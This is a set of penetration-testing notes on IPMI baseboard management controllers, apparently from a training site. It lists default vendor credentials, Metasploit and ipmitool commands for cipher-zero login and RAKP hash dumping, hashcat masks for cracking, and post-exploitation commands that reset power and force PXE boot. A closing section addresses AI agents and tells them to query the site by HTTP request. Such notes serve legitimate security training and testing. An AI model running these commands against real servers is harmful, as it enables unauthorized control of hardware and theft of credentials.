# IPMI Pentesting Notes

## Protocol Overview

### Basic Information

* **Port**: UDP 623
* **Protocol Type**: Hardware management protocol
* **Purpose**: Remote server management and monitoring
* **Security**: Various authentication methods, often poorly configured

### Key Components

1. **BMC (Baseboard Management Controller)**
   * Embedded Linux system
   * Independent of host OS
   * Manages hardware directly
2. **Common Implementations**
   * HP iLO (Integrated Lights Out)
   * Dell iDRAC
   * Supermicro IPMI
   * IBM IMM

## Initial Enumeration

### Port Scanning

```bash
# Basic UDP scan
sudo nmap -sU -p 623 <target>

# Version detection
sudo nmap -sU -p 623 -sV <target>

# IPMI-specific scripts
sudo nmap -sU -p 623 --script ipmi-* <target>
```

### Version Detection

```bash
# Using Metasploit
use auxiliary/scanner/ipmi/ipmi_version
set RHOSTS <target>
run

# Using nmap
sudo nmap -sU --script ipmi-version -p 623 <target>

# Using ipmitool
ipmitool -I lanplus -H <target> -p 623 chassis status
```

## Default Credentials

### Common Defaults

| Vendor     | Username      | Password        |
| ---------- | ------------- | --------------- |
| Dell iDRAC | root          | calvin          |
| HP iLO     | Administrator | <8-char random> |
| Supermicro | ADMIN         | ADMIN           |
| IBM IMM    | USERID        | PASSW0RD        |

### Testing Default Access

```bash
# Using ipmitool
ipmitool -I lanplus -H <target> -U root -P calvin chassis status

# Using Metasploit
use auxiliary/scanner/ipmi/ipmi_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run
```

## Password Attacks

### Hash Dumping

```bash
# Using Metasploit
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS <target>
run

# Using Python
mkdir output
python3 ipmipwner.py --host <target> --output ./output
```

### Cracking Hashes

```bash
# IPMI v2.0 RAKP HMAC-SHA1 hashes
hashcat -m 7300 hashes.txt wordlist.txt

# Custom mask for HP iLO defaults (8 chars, uppercase + numbers)
hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u

# Using John
john --format=rakp hashes.txt
```

## Common NSE Scripts

```bash
# Run all IPMI scripts
sudo nmap -sU -p 623 --script ipmi-* <target>

# Important individual scripts
sudo nmap -sU -p 623 --script ipmi-version <target>      # Version detection
sudo nmap -sU -p 623 --script ipmi-cipher-zero <target>  # Cipher zero auth
sudo nmap -sU -p 623 --script ipmi-brute <target>        # Brute force
```

## Exploitation Techniques

### Cipher Zero Authentication

```bash
# Check for cipher zero
sudo nmap -sU -p 623 --script ipmi-cipher-zero <target>

# Exploit using ipmitool
ipmitool -I lanplus -H <target> -U '' -P '' -C 0 chassis status

# Using Metasploit
use auxiliary/scanner/ipmi/ipmi_cipher_zero
set RHOSTS <target>
run
```

### RAKP Authentication Bypass

```bash
# Dump RAKP hashes
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS <target>
run

# Offline cracking
hashcat -m 7300 rakp.txt wordlist.txt
```

## Post Exploitation

### Information Gathering

```bash
# Get system info
ipmitool -I lanplus -H <target> -U username -P password fru print

# Get sensor data
ipmitool -I lanplus -H <target> -U username -P password sensor list

# Get user list
ipmitool -I lanplus -H <target> -U username -P password user list
```

### System Control

```bash
# Power operations
ipmitool -I lanplus -H <target> -U username -P password chassis power status
ipmitool -I lanplus -H <target> -U username -P password chassis power reset

# Boot device control
ipmitool -I lanplus -H <target> -U username -P password chassis bootdev pxe
```

## Common Vulnerabilities

1. **Authentication Issues**:
   * Default credentials
   * Cipher Zero authentication
   * RAKP authentication bypass
   * Weak password policies
2. **Configuration Problems**:
   * Exposed IPMI interfaces
   * Outdated firmware
   * Missing patches
   * Weak network restrictions
3. **Known CVEs**:
   * CVE-2013-4786 (Cipher Zero)
   * CVE-2013-4787 (IPMI 2.0 RAKP Authentication)
   * Multiple HP iLO vulnerabilities

## Response Codes and Messages

| Code | Meaning           |
| ---- | ----------------- |
| 0x00 | Success           |
| 0xC0 | Node Busy         |
| 0xC1 | Invalid Command   |
| 0xC3 | Timeout           |
| 0xC4 | Out of Space      |
| 0xC5 | Invalid Data      |
| 0xFF | Unspecified Error |

## Best Practices for Pentesting

1. **Initial Reconnaissance**:
   * Port discovery
   * Version detection
   * Default credential testing
   * Cipher support checking
2. **Deep Enumeration**:
   * User enumeration
   * Hash dumping
   * Vulnerability scanning
   * Configuration analysis
3. **Documentation**:
   * Version information
   * Found credentials
   * Vulnerable configurations
   * Successful exploits
4. **Risk Assessment**:
   * Physical access implications
   * Network exposure
   * Credential security
   * Patch status

## Common Tools Summary

1. **Enumeration**:
   * nmap
   * ipmitool
   * Metasploit modules
   * Custom Python scripts
2. **Exploitation**:
   * Metasploit
   * hashcat
   * John the Ripper
   * ipmitool
3. **Post-Exploitation**:
   * ipmitool
   * IPMI management interfaces
   * Custom scripts
   * Web interfaces


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://edu.noirchapeau.com/footprinting-enumeration-and-information-gathering-notes/ipmi-pentesting-notes.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.